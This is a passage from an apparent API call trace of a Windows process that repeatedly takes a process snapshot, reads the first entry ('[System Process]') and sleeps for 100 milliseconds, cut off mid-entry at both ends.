Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.194] Sleep (dwMilliseconds=0x64) [0189.200] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0189.210] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.291] Sleep (dwMilliseconds=0x64) [0189.364] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0189.382] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.477] Sleep (dwMilliseconds=0x64) [0189.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0189.494] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.586] Sleep (dwMilliseconds=0x64) [0189.590] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0189.601] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.694] Sleep (dwMilliseconds=0x64) [0189.725] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0189.742] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.846] Sleep (dwMilliseconds=0x64) [0189.854] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0189.875] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.966] Sleep (dwMilliseconds=0x64) [0189.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0190.003] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.222] Sleep (dwMilliseconds=0x64) [0190.230] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0190.241] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.320] Sleep (dwMilliseconds=0x64) [0190.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0190.336] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.423] Sleep (dwMilliseconds=0x64) [0190.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0190.447] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.547] Sleep (dwMilliseconds=0x64) [0190.558] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0190.572] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.674] Sleep (dwMilliseconds=0x64) [0190.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0190.703] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.827] Sleep (dwMilliseconds=0x64) [0190.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0190.852] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.931] Sleep (dwMilliseconds=0x64) [0190.961] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0190.975] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.158] Sleep (dwMilliseconds=0x64) [0191.167] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0191.178] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.290] Sleep (dwMilliseconds=0x64) [0191.363] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0191.377] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.458] Sleep (dwMilliseconds=0x64) [0191.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0191.478] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.565] Sleep (dwMilliseconds=0x64) [0191.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0191.596] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.674] Sleep (dwMilliseconds=0x64) [0191.833] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0191.846] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.930] Sleep (dwMilliseconds=0x64) [0191.939] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0191.952] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.095] Sleep (dwMilliseconds=0x64) [0192.146] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a4 [0192.208] Process32First (in: hSnapshot=0x22a4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.579] Sleep (dwMilliseconds=0x64) [0192.619] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a4 [0192.631] Process32First (in: hSnapshot=0x22a4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.739] Sleep (dwMilliseconds=0x64) [0192.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0192.933] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.044] Sleep (dwMilliseconds=0x64) [0193.086] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0193.097] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.241] Sleep (dwMilliseconds=0x64) [0193.246] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0193.260] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.776] Sleep (dwMilliseconds=0x64) [0193.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0193.853] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.030] Sleep (dwMilliseconds=0x64) [0194.052] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0194.166] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.285] Sleep (dwMilliseconds=0x64) [0194.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0194.474] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.555] Sleep (dwMilliseconds=0x64) [0194.558] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0194.568] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.649] Sleep (dwMilliseconds=0x64) [0194.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0194.671] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.756] Sleep (dwMilliseconds=0x64) [0194.760] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0194.773] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.860] Sleep (dwMilliseconds=0x64) [0194.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0194.883] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.957] Sleep (dwMilliseconds=0x64) [0194.966] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0194.977] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.065] Sleep (dwMilliseconds=0x64) [0195.075] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0195.092] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.190] Sleep (dwMilliseconds=0x64) [0195.200] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0195.211] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.315] Sleep (dwMilliseconds=0x64) [0195.334] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0195.349] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.453] Sleep (dwMilliseconds=0x64) [0195.464] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0195.484] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.584] Sleep (dwMilliseconds=0x64) [0195.626] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0195.641] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.799] Sleep (dwMilliseconds=0x64) [0195.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2224 [0195.851] Process32First (in: hSnapshot=0x2224, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.033] Sleep (dwMilliseconds=0x64) [0196.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2224 [0196.094] Process32First (in: hSnapshot=0x2224, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.211] Sleep (dwMilliseconds=0x64) [0196.233] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x228c [0196.244] Process32First (in: hSnapshot=0x228c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.352] Sleep (dwMilliseconds=0x64) [0196.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2224 [0196.414] Process32First (in: hSnapshot=0x2224, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.913] Sleep (dwMilliseconds=0x64) [0197.008] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2224 [0197.020] Process32First (in: hSnapshot=0x2224, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.243] Sleep (dwMilliseconds=0x64) [0197.372] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2224 [0197.388] Process32First (in: hSnapshot=0x2224, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.475] Sleep (dwMilliseconds=0x64) [0197.534] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x228c [0197.556] Process32First (in: hSnapshot=0x228c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.630] Sleep (dwMilliseconds=0x64) [0197.667] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x228c [0197.679] Process32First (in: hSnapshot=0x228c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.955] Sleep (dwMilliseconds=0x64) [0198.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2260 [0198.010] Process32First (in: hSnapshot=0x2260, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.135] Sleep (dwMilliseconds=0x64) [0198.191] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0198.204] Process32First (in: hSnapshot=0x2274, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.301] Sleep (dwMilliseconds=0x64) [0198.307] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0198.329] Process32First (in: hSnapshot=0x2274, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.404] Sleep (dwMilliseconds=0x64) [0198.452] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0198.466] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.601] Sleep (dwMilliseconds=0x64) [0198.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0198.673] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.961] Sleep (dwMilliseconds=0x64) [0198.965] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0198.975] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.050] Sleep (dwMilliseconds=0x64) [0199.101] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0199.165] Process32First (in: hSnapshot=0x2274, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.292] Sleep (dwMilliseconds=0x64) [0199.343] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0199.353] Process32First (in: hSnapshot=0x2274, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.430] Sleep (dwMilliseconds=0x64) [0199.620] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0199.755] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.865] Sleep (dwMilliseconds=0x64) [0199.908] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0199.960] Process32First (in: hSnapshot=0x2274, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.084] Sleep (dwMilliseconds=0x64) [0200.124] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0200.133] Process32First (in: hSnapshot=0x2274, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.209] Sleep (dwMilliseconds=0x64) [0200.264] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2274 [0200.274] Process32First (in: hSnapshot=0x2274, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.346] Sleep (dwMilliseconds=0x64) [0200.385] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0200.444] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.628] Sleep (dwMilliseconds=0x64) [0200.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0200.697] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: 